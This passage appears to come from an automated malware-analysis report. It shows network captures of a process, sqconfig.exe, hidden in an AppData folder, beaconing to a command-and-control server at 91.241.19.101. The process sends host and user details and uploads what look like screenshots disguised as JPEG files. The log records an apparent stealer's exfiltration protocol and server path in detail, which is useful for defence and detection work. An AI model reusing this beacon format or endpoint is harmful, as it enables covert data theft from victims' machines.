                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:55.382091999 CEST7688INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  190192.168.2.35002691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:55.904428959 CEST19256OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:55.904752970 CEST19256OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:55.905379057 CEST19266OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:55.905957937 CEST19269OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:56.027076006 CEST19277OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:56.027568102 CEST19285OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:56.027602911 CEST19288OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:56.027688026 CEST19294OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:56.027735949 CEST19297OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:56.027791023 CEST19300OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:56.149992943 CEST19304OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:56.339622021 CEST19350INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  191192.168.2.35002791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:56.067353010 CEST19300OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:56.288309097 CEST19349INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  192192.168.2.35002891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:56.527898073 CEST19350OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:56.707577944 CEST19351INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  193192.168.2.35002991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:56.715806961 CEST19351OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:56.716089010 CEST19351OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:56.716268063 CEST19362OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:56.716381073 CEST19364OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:56.854643106 CEST19367OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:56.854701042 CEST19383OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:56.854731083 CEST19390OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:56.993670940 CEST19393OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:56.993715048 CEST19404OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:56.993746042 CEST19414OUTData Raw: a6 b7 01 c3 a5 25 28 a4 3d 69 bd 84 14 52 52 8e b4 80 70 a7 81 4d 14 b5 68 97 b8 bc 52 d2 67 de 8a 60 3a 96 90 50 29 a2 47 51 49 4b 4c 41 40 a2 8a 62 1e 39 a5 a6 8e 94 e0 69 a1 0b 4b da 9b 9a 75 51 21 4e a6 8a 70 a6 26 2d 2d 14 76 a6 48 b4 66 90
                                                                  Data Ascii: %(=iRRpMhRg`:P)GQIKLA@b9iKuQ!Np&--vHfRJZhC-5iD1)RR\R:TH-|-D>KDE JD)S)M8qV~<t-?3iE1)q Su%-4&>SUf2SDH)4jcSPh4i(L
                                                                  Sep 30, 2021 23:53:56.993879080 CEST19417OUTData Raw: 8c 93 dc fc a3 00 7b 9a c2 82 7f 17 f8 81 45 dd b4 b6 fa 2d 93 f3 12 bc 42 59 59 7b 12 08 c7 3f 85 41 ac a0 bd 9f c1 9a 6c dc db 4c 7c d9 13 b3 14 8d 48 07 db 93 f9 d4 9e 35 d6 75 1b 7d 4f 4c d2 34 fb b4 b1 fb 59 25 ee 5f 1c 0c e0 0c f6 ff 00 f5
                                                                  Data Ascii: {E-BYY{?AlL|H5u}OL4Y%_TPTR%u|]Eik1"Tl-A%1\MSn!}z:%!M?=.|bG?*+V5giP[Wv
                                                                  Sep 30, 2021 23:53:57.212095976 CEST19439INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Sep 30, 2021 23:53:57.239897966 CEST19439OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:57.460675955 CEST19439INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  194192.168.2.35003091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:56.949588060 CEST19390OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:57.134964943 CEST19438INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  195192.168.2.35003191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:57.547867060 CEST19440OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:57.548160076 CEST19440OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:57.548603058 CEST19450OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:57.548902988 CEST19453OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:57.678417921 CEST19464OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:57.678669930 CEST19478OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:57.808806896 CEST19503OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:57.808944941 CEST19526OUTData Raw: 8c 93 dc fc a3 00 7b 9a c2 82 7f 17 f8 81 45 dd b4 b6 fa 2d 93 f3 12 bc 42 59 59 7b 12 08 c7 3f 85 41 ac a0 bd 9f c1 9a 6c dc db 4c 7c d9 13 b3 14 8d 48 07 db 93 f9 d4 9e 35 d6 75 1b 7d 4f 4c d2 34 fb b4 b1 fb 59 25 ee 5f 1c 0c e0 0c f6 ff 00 f5
                                                                  Data Ascii: {E-BYY{?AlL|H5u}OL4Y%_TPTR%u|]Eik1"Tl-A%1\MSn!}z:%!M?=.|bG?*+V5giP[Wv
                                                                  Sep 30, 2021 23:53:57.981559038 CEST19527INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  196192.168.2.35003291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:57.729255915 CEST19479OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:57.948592901 CEST19527INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  197192.168.2.35003391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:58.177541971 CEST19528OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:58.356244087 CEST19542INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
